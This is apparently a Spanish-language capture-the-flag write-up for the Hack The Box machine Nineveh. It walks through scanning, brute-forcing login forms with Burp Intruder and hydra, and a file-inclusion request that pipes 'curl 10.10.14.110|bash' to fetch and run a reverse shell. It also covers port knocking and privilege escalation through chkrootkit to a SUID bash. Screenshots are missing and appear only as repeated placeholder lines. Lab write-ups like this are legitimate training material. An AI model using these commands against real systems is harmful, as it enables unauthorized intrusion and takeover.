Cu3rv0x
Nineveh

Nineveh


HTB Linux

echo “10.129.199.42 nineveh.htb” | sudo tee -a /etc/hosts

nmap -p- —open -T5 -v -n 10.129.199.42

nmap -p- —open -sS —min-rate 5000 -vvv -n -Pn 10.129.199.42 -oG allPorts

ssh_command.

nmap -sCV -p80,443 10.129.199.42 -oN targeted

ssh_command.

whatweb http://10.129.199.42

ssh_command.

ssh_command.

wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.199.42/FUZZ

ssh_command.

ssh_command.

wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt https://10.129.199.42/FUZZ

ssh_command.

Abrimos burpsuite y usamos intruder para hacer un ataque en el formulario de login

ssh_command.

Modificamos el Target scope para que sea el url de nineveh http://10.129.199.42

ssh_command.

Lo configuramos para hacer un ataque llamado sniper. El payload se usaria en el texto que esta entre $.

ssh_command.

head -n 10000 /usr/share/wordlists/rockyou.txt > password.txt

Adquirimos las primeras 1000 palabras de rockyou.txt y lo ponemos en un archivo password.txt

ssh_command.

Subimos el archivo de password.txt para usarlo como payload. Y quitamos el URL-encode these characters.

ssh_command.

En esta parte para el Grep-Extract hacemos una columna de invalid password para que nos demos cuenta si la palabra es valida.

ssh_command.

Encontramos las credenciales admin:1q2w3e4r5t

ssh_command.

Entramos a la pagina y vemos opciones como Home, Notes y Logout.

ssh_command.

Podemos ver que https://nineveh.htb/db/ tiene un phpLiteAdmin

ssh_command.

hydra 10.129.199.42 https-form-post “/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect” -l admin -P /usr/share/wordlists/rockyou.txt

ssh_command.

Usamos burpsuite para poder cambiar la contrasena. Usamos las credenciales password123.

Creamos una base datos nueva. Y le agregamos una tabla tambien.

Se elige la opcion de TEXT y se pone esto en la primera columna:

ssh_command.

Creamos una pagina index.html que tiene un reverse shell a la maquina kali de bash.

python3 -m http.server 80

nc -lvnp 443

ssh_command.

http://10.10.10.43/department/manage.php?notes/ninevehNotes/../var/tmp/test.php&cmd=curl 10.10.14.110|bash

ssh_command.

Antes de seguir adelante vemos la siguiente pagina:

http://nineveh.htb/secure_notes

Y bajamos el png.

ssh_command.

file nineveh.png)

exiftool nineveh.png)

strings nineveh.png)

Vemos que tiene un rsa key.

ssh_command.

creamos un id_rsa

ssh_command.

Como no funciona vim muy bien en la consola. Copie la llave desde kali a la maquina.

python3 -m http.server 80

cd tmp

wget http://10.10.14.110/id_rsa

chmod 600 id_rsa

ssh -i id_rsa amrois@localhost

ssh_command.

El puerto 22 no esta abierto

ssh_command.

knock 10.129.199.42 571:tcp 290:tcp 911:tcp

nmap -p22 10.129.199.42 —open -T5 -v -n

ssh_command.

Bajamos pspy. https://github.com/DominicBreuker/pspy

go build -ldflags “-s -w” main.go

ssh_command.

du -hc main

mv main pspy

ssh_command.

Subimos el archivo a la maquina.

python3 -m http.server 80

wget http://10.10.14.110/pspy

chmod +x pspy

./pspy

Vemos el servicio chkrootkit.

ssh_command.

cd tmp

vim update

Creamos un script que se puede ver en la imagen despues del cat update.

chmod +x update

watch -n 1 ls -l /bin/bash

ssh_command.

ssh_command.

Vemos que ahora tiene una s en los permisos

ssh_command.

bash -p

© 2025 Cu3rv0x